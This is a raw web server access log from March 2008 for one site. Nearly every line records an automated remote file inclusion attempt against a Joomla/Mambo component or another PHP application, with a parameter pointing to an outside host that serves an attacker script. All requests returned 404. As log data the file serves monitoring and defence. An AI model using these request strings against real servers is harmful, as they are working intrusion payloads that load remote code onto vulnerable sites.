66.90.73.122 - - [04/Mar/2008:05:45:55 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:05:45:55 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:05:45:55 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:46:02 -0800] "GET /logs/access_080221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:46:02 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:46:02 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:05:46:31 -0800] "GET /logs/access_080216.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:46:40 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.10.7 - - [04/Mar/2008:05:46:40 -0800] "GET /logs/access_080117.log/moduleshttp://svurology.com/images/avatars/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:46:40 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:46:40 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.10.7 - - [04/Mar/2008:05:46:41 -0800] "GET /moduleshttp://svurology.com/images/avatars/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.47.10.7 - - [04/Mar/2008:05:46:42 -0800] "GET /logs/moduleshttp://svurology.com/images/avatars/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:46:50 -0800] "GET /logs/access_080208.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:46:56 -0800] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:46:56 -0800] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:05:47:02 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.19.151.78 - - [04/Mar/2008:05:47:10 -0800] "GET /logs/access_080221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.19.151.78 - - [04/Mar/2008:05:47:10 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.19.151.78 - - [04/Mar/2008:05:47:10 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:47:14 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:47:14 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:47:15 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:47:27 -0800] "GET /logs/access_080208.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:47:55 -0800] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:47:55 -0800] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:47:56 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:48:07 -0800] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:48:08 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:48:08 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:48:22 -0800] "GET /logs/access_071216.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.10.7 - - [04/Mar/2008:05:48:23 -0800] "GET /logs/access_080211.log/moduleshttp://svurology.com/images/avatars/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:48:50 -0800] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:05:48:52 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:05:48:52 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:05:48:52 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:05:48:53 -0800] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:05:48:53 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:49:21 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:49:21 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:49:23 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:05:49:44 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:05:49:48 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:05:49:53 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.9.78.190 - - [04/Mar/2008:05:50:05 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:05:50:54 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:05:50:54 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:05:51:22 -0800] "GET //class/class.dashboard_cms.php?where_framework=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:05:51:23 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
81.19.151.78 - - [04/Mar/2008:05:52:17 -0800] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:52:25 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:52:25 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:05:52:49 -0800] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:54:01 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:54:29 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:05:54:37 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:05:54:37 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:05:54:38 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:55:09 -0800] "GET /logs/access_080120.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:55:09 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.223.12 - - [04/Mar/2008:05:55:11 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.handball-club-sarrebourg.com/components/com_extcalendar/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.223.12 - - [04/Mar/2008:05:55:11 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.handball-club-sarrebourg.com/components/com_extcalendar/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:05:55:16 -0800] "GET //index.php?command=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:55:26 -0800] "GET /logs/access_080101.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:55:58 -0800] "GET /logs/access_080120.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:55:58 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:56:12 -0800] "GET /logs/access_080101.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.41.19 - - [04/Mar/2008:05:56:31 -0800] "GET /logs/access.log//class/class.dashboard_cms.php?where_framework=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [04/Mar/2008:05:56:31 -0800] "GET //class/class.dashboard_cms.php?where_framework=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [04/Mar/2008:05:56:31 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:57:01 -0800] "GET //plugins/payment/secpay/config.inc.php?config[root_dir]=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:57:01 -0800] "GET /logs//plugins/payment/secpay/config.inc.php?config[root_dir]=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:05:57:29 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.29.0.28 - - [04/Mar/2008:05:57:41 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.9.78.190 - - [04/Mar/2008:05:58:12 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [04/Mar/2008:05:58:26 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [04/Mar/2008:05:59:01 -0800] "GET /logs/access_080216.log//oneadmin/photogallery/include.php?path[docroot]=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.9.78.190 - - [04/Mar/2008:05:59:07 -0800] "GET /logs/access.log/admin/business_inc/saveserver.php?thisdir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.9.78.190 - - [04/Mar/2008:05:59:07 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.9.78.190 - - [04/Mar/2008:05:59:07 -0800] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:59:10 -0800] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:59:11 -0800] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
200.29.0.28 - - [04/Mar/2008:05:59:35 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [04/Mar/2008:05:59:50 -0800] "GET /logs/access_080207.log//class/class.dashboard_cms.php?where_framework=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:00:08 -0800] "GET /logs/access.log//class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:00:11 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:00:12 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.6.223.12 - - [04/Mar/2008:06:00:12 -0800] "GET /logs/access_080207.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.handball-club-sarrebourg.com/components/com_extcalendar/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:00:12 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:00:12 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:06:00:15 -0800] "GET /logs/access.log//include.php?path[docroot]=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.81.213.24 - - [04/Mar/2008:06:00:15 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.pcr.ac.id/~rina/includes/db/alba.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:06:00:15 -0800] "GET //include.php?path[docroot]=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:06:00:16 -0800] "GET /logs//include.php?path[docroot]=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [04/Mar/2008:06:00:39 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [04/Mar/2008:06:00:39 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [04/Mar/2008:06:00:40 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.70.58 - - [04/Mar/2008:06:00:52 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://sierra-hulinggi.com/alat/idscan2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:06:01:26 -0800] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.0.28 - - [04/Mar/2008:06:01:41 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.0.28 - - [04/Mar/2008:06:01:41 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.0.28 - - [04/Mar/2008:06:01:42 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:06:01:46 -0800] "GET /logs/access_080126.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:06:01:46 -0800] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:06:01:51 -0800] "GET /logs/access_080216.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.169.80 - - [04/Mar/2008:06:02:01 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:02:01 -0800] "GET /logs/access_080207.log//class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:02:05 -0800] "GET /logs/access_080207.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:06:02:22 -0800] "GET /logs/access_080131.log//include.php?path[docroot]=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:06:02:34 -0800] "GET /logs/access_080126.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:06:02:34 -0800] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:06:02:34 -0800] "GET /logs/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:06:02:41 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
